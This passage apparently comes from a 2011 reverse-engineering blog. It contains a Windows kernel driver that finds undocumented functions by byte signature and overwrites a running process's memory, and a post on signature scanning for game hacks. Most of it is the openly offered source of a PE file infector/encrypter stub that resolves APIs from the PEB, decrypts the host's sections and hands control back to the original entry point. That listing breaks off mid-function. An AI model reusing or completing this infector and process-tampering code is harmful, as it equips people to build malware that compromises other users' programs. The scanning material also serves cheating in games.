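#include <string.h>

/* Counts how many times `sig` occurs in `image`. The loop bound keeps every
 * comparison inside the buffer. */
static size_t count_signature_matches(const uint8_t *image, size_t image_len,
                                      const uint8_t *sig, size_t sig_len)
{
    size_t matches = 0;
    assert(image != NULL && sig != NULL);
    if (sig_len == 0 || sig_len > image_len) {
        return 0;
    }
    for (size_t i = 0; i <= image_len - sig_len; ++i) {
        if (memcmp(image + i, sig, sig_len) == 0) {
            ++matches;
        }
    }
    return matches;
}
```

A count of exactly one means the signature is safe to use for that build; a higher count means it needs to be lengthened, and a count of zero usually means the bytes differ on that kernel version.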

An Example

The code below is an example I wrote up showing how to write into the virtual address space of a target process. This process is given by name to the OpenProcess function, which retrieves the appropriate EPROCESS block corresponding to the process and opens a handle to it. This handle is then used in conjunction with the undocumented APIs associated with process manipulation (ZwSuspendProcess/ZwResumeProcess) and virtual memory manipulation (ZwProtectVirtualMemory/ZwWriteVirtualMemory). An internal undocumented function (PsGetNextProcess) is also scanned for and retrieved in order to help facilitate process enumeration. The code was written for and tested on an x86 version of Windows XP SP3 and x64 Windows 7 SP1.

#include "stdafx.h"
 
#include "Undocumented.h"
#include <wdm.h>
 
#ifdef __cplusplus
extern "C" NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING  RegistryPath);
#endif
 
pPsGetProcessImageFileName PsGetProcessImageFileName;
pPsGetProcessSectionBaseAddress PsGetProcessSectionBaseAddress;
pPsGetNextProcess PsGetNextProcess;
pZwSuspendProcess ZwSuspendProcess;
pZwResumeProcess ZwResumeProcess;
pZwProtectVirtualMemory ZwProtectVirtualMemory;
pZwWriteVirtualMemory ZwWriteVirtualMemory;
pKiSystemService KiSystemService;
 
#ifdef _M_IX86
__declspec(naked) VOID SyscallTemplate(VOID) {
    __asm {
    /*B8 XX XX XX XX   */ mov eax, 0xC0DE
    /*8D 54 24 04      */ lea edx, [esp + 0x4]
    /*9C               */ pushfd
    /*6A 08            */ push 0x8
    /*FF 15 XX XX XX XX*/ call KiSystemService
    /*C2 XX XX         */ retn 0xBBBB
    }
}
#elif defined(_M_AMD64)
 
BYTE NullStub = 0xC3;
 
BYTE SyscallTemplate[] =
{
    0x48, 0x8B, 0xC4,                                           /*mov rax, rsp*/
    0xFA,                                                       /*cli*/
    0x48, 0x83, 0xEC, 0x10,                                     /*sub rsp, 0x10*/
    0x50,                                                       /*push rax*/
    0x9C,                                                       /*pushfq*/
    0x6A, 0x10,                                                 /*push 0x10*/
    0x48, 0xB8, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, /*mov rax, NullStubAddress*/
    0x50,                                                       /*push rax*/
    0xB8, 0xBB, 0xBB, 0xBB, 0xBB,                               /*mov eax, Syscall*/
    0x68, 0xCC, 0xCC, 0xCC, 0xCC,                               /*push LowBytes*/
    0xC7, 0x44, 0x24, 0x04, 0xCC, 0xCC, 0xCC, 0xCC,             /*mov [rsp+0x4], HighBytes*/
    0xC3                                                        /*ret*/
};
#endif
 
PVOID FindFunctionInModule(IN CONST BYTE *Signature,
    IN ULONG SignatureSize,
    IN PVOID KernelBaseAddress,
    IN ULONG ImageSize) {
 
    BYTE *CurrentAddress = 0;
    ULONG i = 0;
 
    DbgPrint("+ Scanning from %p to %p\n", KernelBaseAddress, (ULONG_PTR)KernelBaseAddress + ImageSize);
    CurrentAddress = (BYTE *)KernelBaseAddress;
 
    //Stop early enough that the comparison never reads past the end of the image
    for(i = 0; i + SignatureSize <= ImageSize; ++i) {
        if(RtlCompareMemory(CurrentAddress, Signature, SignatureSize) == SignatureSize) {
            DbgPrint("+ Found function at %p\n", CurrentAddress);
            return (PVOID)CurrentAddress;
        }
        ++CurrentAddress;
    }
    return NULL;
}
 
NTSTATUS ResolveFunctions(IN PSYSTEM_MODULE KernelInfo) {
 
    UNICODE_STRING PsGetProcessImageFileNameStr = {0};
    UNICODE_STRING PsGetProcessSectionBaseAddressStr = {0};
#ifdef _M_IX86
    CONST BYTE PsGetNextProcessSignature[] =
    {
        0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x51, 0x83, 0x65,
        0xFC, 0x00, 0x56, 0x57, 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00,
        0x8B, 0xF0, 0xFF, 0x8E, 0xD4, 0x00, 0x00, 0x00, 0xB9, 0xC0,
        0x38, 0x56, 0x80, 0xE8, 0xB4, 0xEE, 0xF6, 0xFF, 0x8B, 0x45,
        0x08, 0x85, 0xC0
    };
#elif defined(_M_AMD64)
    CONST BYTE PsGetNextProcessSignature[] =
    {
        0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x6C, 0x24, 0x10,
        0x48, 0x89, 0x74, 0x24, 0x18, 0x57, 0x41, 0x54, 0x41, 0x55,
        0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xEC, 0x20, 0x65, 0x48,
        0x8B, 0x34, 0x25, 0x88, 0x01, 0x00, 0x00, 0x45, 0x33, 0xED,
        0x48, 0x8B, 0xF9, 0x66, 0xFF, 0x8E, 0xC6, 0x01, 0x00, 0x00,
        0x4D, 0x8B, 0xE5, 0x41, 0x8B, 0xED, 0x41, 0x8D, 0x4D, 0x11,
        0x33, 0xC0,
    };
#endif
#ifdef _M_IX86
    CONST BYTE KiSystemServiceSignature[] =
    {
        0x6A, 0x00, 0x55, 0x53, 0x56, 0x57, 0x0F, 0xA0, 0xBB, 0x30,
        0x00, 0x00, 0x00, 0x66, 0x8E, 0xE3, 0x64, 0xFF, 0x35, 0x00,
        0x00, 0x00, 0x00
    };
#elif defined(_M_AMD64)
    CONST BYTE KiSystemServiceSignature[] =
    {
        0x48, 0x83, 0xEC, 0x08, 0x55, 0x48, 0x81, 0xEC, 0x58, 0x01,
        0x00, 0x00, 0x48, 0x8D, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00,
        0x48, 0x89, 0x9D, 0xC0, 0x00, 0x00, 0x00, 0x48, 0x89, 0xBD,
        0xC8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xB5, 0xD0, 0x00, 0x00,
        0x00, 0xFB, 0x65, 0x48, 0x8B, 0x1C, 0x25, 0x88, 0x01, 0x00,
        0x00
    };
#endif
    RtlInitUnicodeString(&PsGetProcessImageFileNameStr, L"PsGetProcessImageFileName");
    RtlInitUnicodeString(&PsGetProcessSectionBaseAddressStr, L"PsGetProcessSectionBaseAddress");
 
    PsGetProcessImageFileName = (pPsGetProcessImageFileName)MmGetSystemRoutineAddress(&PsGetProcessImageFileNameStr);
    if(PsGetProcessImageFileName == NULL) {
        DbgPrint("- Could not find PsGetProcessImageFileName\n");
        return STATUS_UNSUCCESSFUL;
    }
    DbgPrint("+ Found PsGetProcessImageFileName at %p\n", PsGetProcessImageFileName);
 
    PsGetProcessSectionBaseAddress = (pPsGetProcessSectionBaseAddress)MmGetSystemRoutineAddress(&PsGetProcessSectionBaseAddressStr);
    if(PsGetProcessSectionBaseAddress == NULL) {
        DbgPrint("- Could not find PsGetProcessSectionBaseAddress\n");
        return STATUS_UNSUCCESSFUL;
    }
    DbgPrint("+ Found PsGetProcessSectionBaseAddress at %p\n", PsGetProcessSectionBaseAddress);
 
    PsGetNextProcess = (pPsGetNextProcess)FindFunctionInModule(PsGetNextProcessSignature,
        sizeof(PsGetNextProcessSignature), KernelInfo->ImageBaseAddress, KernelInfo->ImageSize);
    if(PsGetNextProcess == NULL) {
        DbgPrint("- Could not find PsGetNextProcess\n");
        return STATUS_UNSUCCESSFUL;
    }
    DbgPrint("+ Found PsGetNextProcess at %p\n", PsGetNextProcess);
 
    KiSystemService = (pKiSystemService)FindFunctionInModule(KiSystemServiceSignature,
        sizeof(KiSystemServiceSignature), KernelInfo->ImageBaseAddress, KernelInfo->ImageSize);
    if(KiSystemService == NULL) {
        DbgPrint("- Could not find KiSystemService\n");
        return STATUS_UNSUCCESSFUL;
    }
    DbgPrint("+ Found KiSystemService at %p\n", KiSystemService);
 
    return STATUS_SUCCESS;
}
 
VOID OnUnload(IN PDRIVER_OBJECT DriverObject) {
 
    DbgPrint("+ Unloading\n");
}
 
PSYSTEM_MODULE GetKernelModuleInfo(VOID) {
 
    PSYSTEM_MODULE SystemModule = NULL;
    PSYSTEM_MODULE FoundModule = NULL;
    ULONG_PTR SystemInfoLength = 0;
    PVOID Buffer = NULL;
    ULONG Count = 0;
    ULONG i = 0;
    ULONG j = 0;
    //Other names for WinXP
    CONST CHAR *KernelNames[] = { "ntoskrnl.exe", "ntkrnlmp.exe", "ntkrnlpa.exe", "ntkrpamp.exe" };
 
    //Perform error checking on the calls in actual code
    (VOID)ZwQuerySystemInformation(SystemModuleInformation, &SystemInfoLength, 0, &SystemInfoLength);
    Buffer = ExAllocatePool(NonPagedPool, SystemInfoLength);
    (VOID)ZwQuerySystemInformation(SystemModuleInformation, Buffer, SystemInfoLength, NULL);
 
    Count = ((PSYSTEM_MODULE_INFORMATION)Buffer)->ModulesCount;
    for(i = 0; i < Count; ++i) {
        SystemModule = &((PSYSTEM_MODULE_INFORMATION)Buffer)->Modules[i];
        for(j = 0; j < sizeof(KernelNames) / sizeof(KernelNames[0]); ++j) {
            if(strstr((LPCSTR)SystemModule->Name, KernelNames[j]) != NULL) {
                FoundModule = (PSYSTEM_MODULE)ExAllocatePool(NonPagedPool, sizeof(SYSTEM_MODULE));
                RtlCopyMemory(FoundModule, SystemModule, sizeof(SYSTEM_MODULE));
                ExFreePool(Buffer);
                return FoundModule;
            }
        }
    }
    DbgPrint("Could not find the kernel in module list\n");
    //Release the module list on the failure path as well
    ExFreePool(Buffer);
    return NULL;
}
 
PEPROCESS GetEPROCESSFromName(IN CONST CHAR *ImageName) {
 
    PEPROCESS ProcessHead = PsGetNextProcess(NULL);
    PEPROCESS Process = PsGetNextProcess(NULL);
    CHAR *ProcessName = NULL;
 
    do {
        ProcessName = PsGetProcessImageFileName(Process);
        DbgPrint("+ Currently looking at %s\n", ProcessName);
        if(strstr(ProcessName, ImageName) != NULL) {
            DbgPrint("+ Found the process -- %s\n", ProcessName);
            return Process;
        }
        Process = PsGetNextProcess(Process);
    } while(Process != NULL && Process != ProcessHead);
    DbgPrint("- Could not find %s\n", ImageName);
    return NULL;
}
 
HANDLE GetProcessIdFromEPROCESS(PEPROCESS Process) {
 
    return PsGetProcessId(Process);
}
 
HANDLE OpenProcess(IN CONST CHAR *ProcessName, OUT OPTIONAL PEPROCESS *pProcess) {
 
    HANDLE ProcessHandle = NULL;
    CLIENT_ID ClientId = {0};
    OBJECT_ATTRIBUTES ObjAttributes = {0};
    PEPROCESS EProcess = GetEPROCESSFromName(ProcessName);
    NTSTATUS Status = STATUS_UNSUCCESSFUL;
 
    if(EProcess == NULL) {
        return NULL;
    }
    InitializeObjectAttributes(&ObjAttributes, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
    ObjAttributes.ObjectName = NULL;
    ClientId.UniqueProcess = GetProcessIdFromEPROCESS(EProcess);
    ClientId.UniqueThread = NULL;
 
    Status = ZwOpenProcess(&ProcessHandle, PROCESS_ALL_ACCESS, &ObjAttributes, &ClientId);
    if(!NT_SUCCESS(Status)) {
        DbgPrint("- Could not open process %s. -- %X\n", ProcessName, Status);
        return NULL;
    }
    if(pProcess != NULL) {
        *pProcess = EProcess;
    }
    return ProcessHandle;
}
 
PVOID CreateSyscallWrapper(IN LONG Index, IN SHORT NumParameters) {
 
#ifdef _M_IX86
    SIZE_T StubLength = 0x15;
    PVOID Buffer = ExAllocatePool(NonPagedPool, StubLength);
    BYTE *SyscallIndex = ((BYTE *)Buffer) + sizeof(BYTE);
    BYTE *Retn = ((BYTE *)Buffer) + (0x13 * (sizeof(BYTE)));
    RtlCopyMemory(Buffer, SyscallTemplate, StubLength);
    NumParameters = NumParameters * sizeof(ULONG_PTR);
    RtlCopyMemory(SyscallIndex, &Index, sizeof(LONG));
    RtlCopyMemory(Retn, &NumParameters, sizeof(SHORT));
    return Buffer;
#elif defined(_M_AMD64)
    PVOID Buffer = ExAllocatePool(NonPagedPool, sizeof(SyscallTemplate));
    BYTE *NullStubAddress = &NullStub;
    BYTE *NullStubAddressIndex = ((BYTE *)Buffer) + (14 * sizeof(BYTE));
    BYTE *SyscallIndex = ((BYTE *)Buffer) + (24 * sizeof(BYTE));
    BYTE *LowBytesIndex = ((BYTE *)Buffer) + (29 * sizeof(BYTE));
    BYTE *HighBytesIndex = ((BYTE *)Buffer) + (37 * sizeof(BYTE));
    ULONG LowAddressBytes = ((ULONG_PTR)KiSystemService) & 0xFFFFFFFF;
    ULONG HighAddressBytes = ((ULONG_PTR)KiSystemService >> 32);
    RtlCopyMemory(Buffer, SyscallTemplate, sizeof(SyscallTemplate));
    RtlCopyMemory(NullStubAddressIndex, (PVOID)&NullStubAddress, sizeof(BYTE *));
    RtlCopyMemory(SyscallIndex, &Index, sizeof(LONG));
    RtlCopyMemory(LowBytesIndex, &LowAddressBytes, sizeof(ULONG));
    RtlCopyMemory(HighBytesIndex, &HighAddressBytes, sizeof(ULONG));
    return Buffer;
#endif
}
 
VOID InitializeSyscalls(VOID) {
 
#ifdef _M_IX86
    ZwSuspendProcess = (pZwSuspendProcess)CreateSyscallWrapper(0x00FD, 1);
    ZwResumeProcess = (pZwResumeProcess)CreateSyscallWrapper(0x00CD, 1);
    ZwProtectVirtualMemory = (pZwProtectVirtualMemory)CreateSyscallWrapper(0x0089, 5);
    ZwWriteVirtualMemory = (pZwWriteVirtualMemory)CreateSyscallWrapper(0x0115, 5);
#elif defined(_M_AMD64)
    ZwSuspendProcess = (pZwSuspendProcess)CreateSyscallWrapper(0x017A, 1);
    ZwResumeProcess = (pZwResumeProcess)CreateSyscallWrapper(0x0144, 1);
    ZwProtectVirtualMemory = (pZwProtectVirtualMemory)CreateSyscallWrapper(0x004D, 5);
    ZwWriteVirtualMemory = (pZwWriteVirtualMemory)CreateSyscallWrapper(0x0037, 5);
#endif
}
 
VOID FreeSyscalls(VOID) {
 
    ExFreePool(ZwSuspendProcess);
    ExFreePool(ZwResumeProcess);
    ExFreePool(ZwProtectVirtualMemory);
    ExFreePool(ZwWriteVirtualMemory);
}
 
PVOID GetProcessBaseAddress(IN PEPROCESS Process) {
 
    return PsGetProcessSectionBaseAddress(Process);
}
 
NTSTATUS WriteToProcessAddress(IN HANDLE ProcessHandle, IN PVOID BaseAddress, IN BYTE *NewBytes, IN SIZE_T NewBytesSize) {
 
    ULONG OldProtections = 0;
    SIZE_T BytesWritten = 0;
    SIZE_T NumBytesToProtect = NewBytesSize;
    NTSTATUS Status = STATUS_UNSUCCESSFUL;
 
    //Needs error checking
    Status = ZwSuspendProcess(ProcessHandle);
    Status = ZwProtectVirtualMemory(ProcessHandle, &BaseAddress, &NumBytesToProtect, PAGE_EXECUTE_READWRITE, &OldProtections);
    Status = ZwWriteVirtualMemory(ProcessHandle, BaseAddress, NewBytes, NewBytesSize, &BytesWritten);
    Status = ZwProtectVirtualMemory(ProcessHandle, &BaseAddress, &NumBytesToProtect, OldProtections, &OldProtections);
    Status = ZwResumeProcess(ProcessHandle);
 
    return STATUS_SUCCESS;
}
 
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING  RegistryPath) {
 
    PSYSTEM_MODULE KernelInfo = NULL;
    PEPROCESS Process = NULL;
    HANDLE ProcessHandle = NULL;
    PVOID BaseAddress = NULL;
    BYTE NewBytes[0x100] = {0};
    NTSTATUS Status = STATUS_UNSUCCESSFUL;
 
    DbgPrint("+ Driver successfully loaded\n");
 
    DriverObject->DriverUnload = OnUnload;
 
    KernelInfo = GetKernelModuleInfo();
    if(KernelInfo == NULL) {
        DbgPrint("Could not find kernel module\n");
        return STATUS_UNSUCCESSFUL;
    }
    DbgPrint("+ Found kernel module.\n"
        "+ Name: %s -- Base address: %p -- Size: %p\n", KernelInfo->Name,
        KernelInfo->ImageBaseAddress, KernelInfo->ImageSize);
 
    if(!NT_SUCCESS(ResolveFunctions(KernelInfo))) {
        ExFreePool(KernelInfo);
        return STATUS_UNSUCCESSFUL;
    }
 
    InitializeSyscalls();
 
    ProcessHandle = OpenProcess("notepad.exe", &Process);
    if(ProcessHandle == NULL) {
        FreeSyscalls();
        ExFreePool(KernelInfo);
        return STATUS_UNSUCCESSFUL;
    }
    BaseAddress = GetProcessBaseAddress(Process);
    if(BaseAddress == NULL) {
        ZwClose(ProcessHandle);
        FreeSyscalls();
        ExFreePool(KernelInfo);
        return STATUS_UNSUCCESSFUL;
    }
 
    DbgPrint("Invoking\n");
    RtlFillMemory(NewBytes, sizeof(NewBytes), 0x90);
    (VOID)WriteToProcessAddress(ProcessHandle, BaseAddress, NewBytes, sizeof(NewBytes));
    DbgPrint("+ Done\n");
 
    ExFreePool(KernelInfo);
    FreeSyscalls();
    ZwClose(ProcessHandle);
 
    return STATUS_SUCCESS;
}

May 26, 2011

Quick Post: Auto-updating with Signature Scanning

Filed under: Game Hacking,General x86,General x86-64 — admin @ 2:38 AM

One common problem with developing hacks or external modifications for games and applications is that the target application changes over time through patches and new versions. Any offsets, structures, or functions that the hack hardcodes may then become useless. For example, assume that the hack puts a hook on a function at 0x1234ABCD. One day, a new version of the application is released and the newly compiled version no longer has this function at 0x1234ABCD; it is now at a different address, 0x12345678. Now the hack no longer works and, in the worst case, even crashes the application when used. This becomes annoying because some applications are updated frequently, which in turn requires frequent updates on the part of the hack developer. Even if the updates aren’t too frequent, it can be unnecessarily inconvenient to hunt down where the structures, functions, and so on ended up.

One solution to this is called signature scanning. This technique is nothing new or special and has been used by both hack developers and anti-virus programs for many years (probably for much longer by anti-virus programs than by hacks). It relies on finding parts of a program by scanning for certain byte patterns. For example, anti-virus programs rely partially on signature scanning when they scan files, since each virus or variant can be identified by a sequence of bytes unique to it. Byte strings from scanned programs are taken and hashed. This hash is compared with known virus hashes in a database, and if there is a match then there is a good chance that the application is a virus or has been infected. This of course ignores the additional heuristics and scanning methods incorporated into anti-virus programs, but at a very basic level it is still a key component of how they all work.

This same methodology can be applied to developing game hacks or external modifications to applications in general, since functions, structures, and so on also have unique byte patterns identifying them.

Shown above is part of a function that could serve as a signature. No other function in the application performs this unique set of instructions, so as long as this function does not change (its code is not modified, and it is not rebuilt with different optimization settings or a different compiler), it can always be identified with \x55\x8B\xEC\x51\x6A\x10\...\xD9\x59\x04 regardless of any updates or patches to the application. However, this technique is not without its downsides: scanning an entire file or image is slow. It is therefore a bad idea to develop a hack that scans an image for a signature each time it is loaded, since that can slow things down a lot. What I personally do is keep an external config file that holds signatures and the offset (RVA) into the image at which they’re located. Then when a hack is loaded it can read in the config file and check that the signature exists where it’s supposed to. If it doesn’t, the hack performs a scan on the whole image and writes the signature’s new location back into the config file. This is only one way of doing it though, so to each their own. Since the implementation is just searching for a substring, I feel that there’s really no need to put one here. Important things to note though for developing signature scanners:

  • Signature scanners should have some wildcard usage built in. Whether EAX, EBX, and so on is used to hold a temporary value is irrelevant. For example, MOV EAX, 0x123 as a byte string is B823010000 and MOV EBX, 0x123 is BB23010000. The important part of those instructions is the 0x123 immediate value, so the B8 or BB opcode byte can be ignored. The signature can then be \x??\x23\x01\x00\x00. How \x?? is treated is implementation dependent.
  • Usually the most important parts of a signature are any references to other code, structures, local variables, etc. Getting a signature containing these will increase the chance of it being found. However, references to other code are a bit dangerous since relative distances can change between new versions of a target application.
  • A signature, by definition, should be unique. Using PUSH EBP ; MOV EBP, ESP is a bad idea, since nearly every function begins with that prologue.
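
Although the search itself is simple, the wildcard and cached-offset ideas above can be sketched in a few lines. The following is only a minimal illustration, not the implementation used in any particular hack: the names SigByte, matches_at, scan_image, locate, and kNotFound are made up for this example, the image is assumed to already be in memory as a byte vector, and the cached offset stands in for the value that would be read from the config file.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Hypothetical sentinel meaning "signature not present in the image".
const std::size_t kNotFound = static_cast<std::size_t>(-1);

// One signature byte: either an exact value or a wildcard (the \x?? case).
struct SigByte {
    std::uint8_t value;
    bool wildcard;
};

// Returns true if the signature matches the image starting at `offset`.
bool matches_at(const std::vector<std::uint8_t> &image, std::size_t offset,
                const std::vector<SigByte> &sig) {
    if (sig.empty() || offset > image.size() || sig.size() > image.size() - offset)
        return false;
    for (std::size_t i = 0; i < sig.size(); ++i) {
        // Wildcard positions match any byte; all others must be equal.
        if (!sig[i].wildcard && image[offset + i] != sig[i].value)
            return false;
    }
    return true;
}

// Naive linear scan of the whole image; returns the first matching offset.
std::size_t scan_image(const std::vector<std::uint8_t> &image,
                       const std::vector<SigByte> &sig) {
    assert(!sig.empty());  // an empty signature would be meaningless
    for (std::size_t offset = 0; offset + sig.size() <= image.size(); ++offset) {
        if (matches_at(image, offset, sig))
            return offset;
    }
    return kNotFound;
}

// Check the cached offset first and fall back to a full scan only when the
// signature has moved. A caller would write the new offset back to its config.
std::size_t locate(const std::vector<std::uint8_t> &image,
                   const std::vector<SigByte> &sig, std::size_t cached_offset) {
    if (matches_at(image, cached_offset, sig))
        return cached_offset;
    return scan_image(image, sig);
}
```

With the image bytes 55 8B EC BB 23 01 00 00 C3 and the signature \x??\x23\x01\x00\x00, scan_image returns offset 3, and locate returns the same offset whether the cached value is correct (3) or stale (0).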

A downloadable PDF of this post can be found here.

April 23, 2011

Writing a File Infector/Encrypter: Full Source Code and Remarks (4/4)

Filed under: Cryptography,General x86,Reverse Engineering — admin @ 5:54 PM

The full source code is reproduced below. The archive at the end of this post contains the source code and a compiled executable. 

Main.cpp

#include <Windows.h>
#include <wchar.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "Injector.h"
#include "Encrypter.h"
 
#define BB(x) __asm _emit x
 
#define STRING_COMPARE(str1, str2) \
    __asm push str1 \
    __asm call get_string_length \
    __asm push eax \
    __asm push str1 \
    __asm mov eax, str2 \
    __asm push eax \
    __asm call strings_equal
 
#pragma code_seg(".inject")
void __declspec(naked) injection_stub(void) {
    __asm { //Prologue, stub entry point
        pushad                  //Save context of entry point
        push ebp                //Set up stack frame
        mov ebp, esp
        sub esp, 0x200          //Space for local variables
 
    }
    PIMAGE_DOS_HEADER target_image_base;
    PIMAGE_DOS_HEADER kernel32_image_base;
    __asm {
        call get_module_list    //Get InLoadOrderModuleList via the PEB
        mov ebx, eax
        push 0
        push ebx
        call get_dll_base       //Get image base of process
        mov [target_image_base], eax
        push 2
        push ebx
        call get_dll_base       //Get kernel32.dll image base
        mov [kernel32_image_base], eax
    }
    __asm { //Decrypt all sections
        push kernel32_image_base
        push target_image_base
        call decrypt_sections
    }
    //Any additional code can go here
    __asm { //Epilogue, stub exit point
        mov eax, target_image_base
        add eax, 0xCCDDEEFF     //Signature to be replaced by original entry point (OEP)
        mov esp, ebp
        mov [esp+0x20], eax     //Store OEP in EAX through ESP to preserve across popad
        pop ebp
        popad                   //Restore thread context, with OEP in EAX
        jmp eax                 //Jump to OEP
    }
 
    ///////////////////////////////////////////////////////////////////
    //Gets the module list
    //Preserves no registers, PEB->PPEB_LDR_DATA->InLoadOrderModuleList returned in EAX
    ///////////////////////////////////////////////////////////////////
    __asm {
    get_module_list:       
            mov eax, fs:[0x30]  //PEB
            mov eax, [eax+0xC]  //PEB->PPEB_LDR_DATA
            mov eax, [eax+0xC]  //PEB->PPEB_LDR_DATA->InLoadOrderModuleList
            retn
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Gets the DllBase member of the InLoadOrderModuleList structure
    //Call as void *get_dll_base(void *InLoadOrderModuleList, int index)
    ///////////////////////////////////////////////////////////////////
    __asm {
    get_dll_base:
        push ebp
        mov ebp, esp
        mov eax, [ebp+0x8]      //PEB->PPEB_LDR_DATA->InLoadOrderModuleList address
        cmp dword ptr [ebp+0xC], 0x0 //Initial zero check, EAX is already valid if taken
        je done
        mov ecx, [ebp+0xC]      //Set loop index
        traverse_list:
            mov eax, [eax]      //Go to next entry
        loop traverse_list
        done:
            mov eax, [eax+0x18] //PEB->PPEB_LDR_DATA->InLoadOrderModuleList.DllBase
            mov esp, ebp
            pop ebp
            ret 0x8
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Gets the length of the string passed as the parameter
    //Call as int get_string_length(char *str)
    ///////////////////////////////////////////////////////////////////
    __asm {
    get_string_length:
        push ebp
        mov ebp, esp
        mov edi, [ebp+0x8]      //String held here
        mov eax, 0x0            //EAX holds size of the string
        counting_loop:
            cmp byte ptr[edi], 0x0//Current byte is null-terminator?
            je string_done      //Done, leave loop
            inc edi             //Go to next character
            inc eax             //size++
            jmp counting_loop
        string_done:
            mov esp, ebp
            pop ebp
            ret 0x4             //Callee removes the single argument, like the other helpers
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //String comparison function, checks for equality of two strings
    //Call as bool strings_equal(char *check_string, char *known_string, int known_string_length)
    ///////////////////////////////////////////////////////////////////
    __asm {
    strings_equal:
        push ebp
        mov ebp, esp
        mov eax, 0x0            //Assume unequal
        cld                     //Forward comparison
        mov esi, [ebp+0x8]      //ESI gets check_string
        mov edi, [ebp+0xC]      //EDI gets known_string
        mov ecx, [ebp+0x10]     //ECX gets known_string_length
        repe cmpsb              //Start comparing
        jne end
        mov eax, 0x1            //Strings equal
    end:
        mov esp, ebp
        pop ebp
        ret 0xC
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Implementation of GetProcAddress
    //Call as FARPROC GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
    ///////////////////////////////////////////////////////////////////
    get_proc_address:
        __asm {
            push ebp
            mov ebp, esp
            sub esp, 0x200
        }
        PIMAGE_DOS_HEADER kernel32_dos_header;
        PIMAGE_NT_HEADERS kernel32_nt_headers;
        PIMAGE_EXPORT_DIRECTORY kernel32_export_dir;
        unsigned short *ordinal_table;
        unsigned long *function_table;
        FARPROC function_address;
        int function_names_equal;
        __asm { //Initializations
            mov eax, [ebp+0x8]
            mov kernel32_dos_header, eax
            mov function_names_equal, 0x0
        }
        kernel32_nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)kernel32_dos_header + kernel32_dos_header->e_lfanew);
        kernel32_export_dir = (PIMAGE_EXPORT_DIRECTORY)((DWORD_PTR)kernel32_dos_header + 
            kernel32_nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
        for(unsigned long i = 0; i < kernel32_export_dir->NumberOfNames; ++i) {
            char *eat_entry = (*(char **)((DWORD_PTR)kernel32_dos_header + kernel32_export_dir->AddressOfNames + i * sizeof(DWORD_PTR)))
                + (DWORD_PTR)kernel32_dos_header;   //Current name in name table
            STRING_COMPARE([ebp+0xC], eat_entry) //Compare function in name table with the one we want to find
            __asm mov function_names_equal, eax
            if(function_names_equal == 1) {
                ordinal_table = (unsigned short *)(kernel32_export_dir->AddressOfNameOrdinals + (DWORD_PTR)kernel32_dos_header);
                function_table = (unsigned long *)(kernel32_export_dir->AddressOfFunctions + (DWORD_PTR)kernel32_dos_header);
                function_address = (FARPROC)((DWORD_PTR)kernel32_dos_header + function_table[ordinal_table[i]]);
                break;
            }
        }
        __asm {
            mov eax, function_address
            mov esp, ebp
            pop ebp
            ret 0x8
        }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Decrypts all sections in the image, excluding .rdata/.rsrc/.inject
    //Call as void decrypt_sections(void *image_base, void *kernel32_base)
    ///////////////////////////////////////////////////////////////////
    decrypt_sections:
        __asm {
            push ebp
            mov ebp, esp
            sub esp, 0x200
        }
        typedef BOOL (WINAPI *pVirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect,
            PDWORD lpflOldProtect);
        char *str_virtualprotect;
        char *str_section_name;
        char *str_rdata_name;
        char *str_rsrc_name;
        PIMAGE_DOS_HEADER target_dos_header;
        int section_offset;
        int section_names_equal;
        unsigned long old_protections;
        pVirtualProtect virtualprotect_addr;
        __asm { //String initializations
            jmp virtualprotect
            virtualprotectback:
                pop esi
                mov str_virtualprotect, esi
            jmp section_name
            section_nameback:
                pop esi
                mov str_section_name, esi
            jmp rdata_name
            rdata_nameback:
                pop esi
                mov str_rdata_name, esi
            jmp rsrc_name
            rsrc_nameback:
                pop esi
                mov str_rsrc_name, esi
        }
        __asm { //Initializations
            mov eax, [ebp+0x8]
            mov target_dos_header, eax
            mov section_offset, 0x0
            mov section_names_equal, 0x0
            push str_virtualprotect
            push [ebp+0xC]
            call get_proc_address
            mov virtualprotect_addr, eax
        }
        PIMAGE_NT_HEADERS target_nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)target_dos_header + target_dos_header->e_lfanew);
        for(unsigned long j = 0; j < target_nt_headers->FileHeader.NumberOfSections; ++j) {
            section_offset = (target_dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS) +
                (sizeof(IMAGE_SECTION_HEADER) * j));
            PIMAGE_SECTION_HEADER section_header = (PIMAGE_SECTION_HEADER)((DWORD_PTR)target_dos_header + section_offset);
            STRING_COMPARE(str_section_name, section_header)
            __asm mov section_names_equal, eax
            STRING_COMPARE(str_rdata_name, section_header)
            __asm add section_names_equal, eax
            STRING_COMPARE(str_rsrc_name, section_header)
            __asm add section_names_equal, eax
            if(section_names_equal == 0) {
                unsigned char *current_byte = 
                    (unsigned char *)((DWORD_PTR)target_dos_header + section_header->VirtualAddress);
                unsigned char *last_byte = 
                    (unsigned char *)((DWORD_PTR)target_dos_header + section_header->VirtualAddress 
                    + section_header->SizeOfRawData);
                const unsigned int num_rounds = 32;
                const unsigned int key[4] = {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE};
